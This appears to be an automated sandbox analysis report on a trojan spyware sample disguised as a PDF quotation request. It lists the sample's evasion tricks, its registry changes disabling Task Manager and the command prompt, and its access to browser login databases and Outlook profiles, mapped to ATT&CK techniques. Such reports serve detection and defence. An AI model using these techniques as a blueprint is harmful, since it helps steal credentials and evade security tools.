            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004972000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/8@7/6
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Mutant created: NULL
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsl12EF.tmp
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035024000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035004000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034FF5000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3319784742.0000000035F2D000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034FE6000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035018000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Virustotal: Detection: 46%
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe ReversingLabs: Detection: 23%
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe File read: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
            Source: unknown Process created: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Process created: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: Yara matchFile source: 00000000.00000002.2521858617.000000000342E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CA1DE1 push ds; retf 6137h4_2_37CA205E
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383C0868 pushad ; retf 4_2_383C0875
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383C1181 pushfd ; retf 4_2_383C118D
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383C35E0 push D25837D1h; retf 4_2_383C35EE
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383C36F8 push D2DC37D1h; retf 4_2_383C3706
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile created: \request for quoation and prices 0910775_pdf.exe
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile created: \request for quoation and prices 0910775_pdf.exeJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeAPI/Special instruction interceptor: Address: 3A7608B
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeAPI/Special instruction interceptor: Address: 282608B
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeRDTSC instruction interceptor: First address: 3A35E5B second address: 3A35E5B instructions: 0x00000000 rdtsc 0x00000002 test bx, bx 0x00000005 test ch, ah 0x00000007 cmp ebx, ecx 0x00000009 jc 00007FF460FF6A33h 0x0000000b test ecx, ecx 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeRDTSC instruction interceptor: First address: 27E5E5B second address: 27E5E5B instructions: 0x00000000 rdtsc 0x00000002 test bx, bx 0x00000005 test ch, ah 0x00000007 cmp ebx, ecx 0x00000009 jc 00007FF460FF6B33h 0x0000000b test ecx, ecx 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeMemory allocated: 34F00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeMemory allocated: 36F00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeWindow / User API: threadDelayed 947Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeWindow / User API: threadDelayed 8910Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeAPI coverage: 3.9 %
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -31359464925306218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 5244Thread sleep count: 947 > 30Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 5244Thread sleep count: 8910 > 30Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004938000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe API call chain: ExitProcess graph end node graph_0-3761
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe API call chain: ExitProcess graph end node graph_0-3941
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Process created: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Queries volume information: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe VolumeInformation
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Code function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Registry value created: DisableTaskMgr 1
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Registry value created: DisableCMD 1
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

            Stealing of Sensitive Information

            Source: Yara match File source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe PID: 616, type: MEMORYSTR
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Remote Access Functionality

            Source: Yara match File source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe PID: 616, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 11 Process Injection | 31 Disable or Modify Tools | LSASS Memory | 31 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Access Token Manipulation | NTDS | 1 System Network Configuration Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 215 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Source | Detection | Scanner | Label | Link
            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | 46% | Virustotal | | Browse
            REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | 24% | ReversingLabs | Win32.Trojan.Garf |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll | 0% | Virustotal | | Browse

            No Antivirus matches
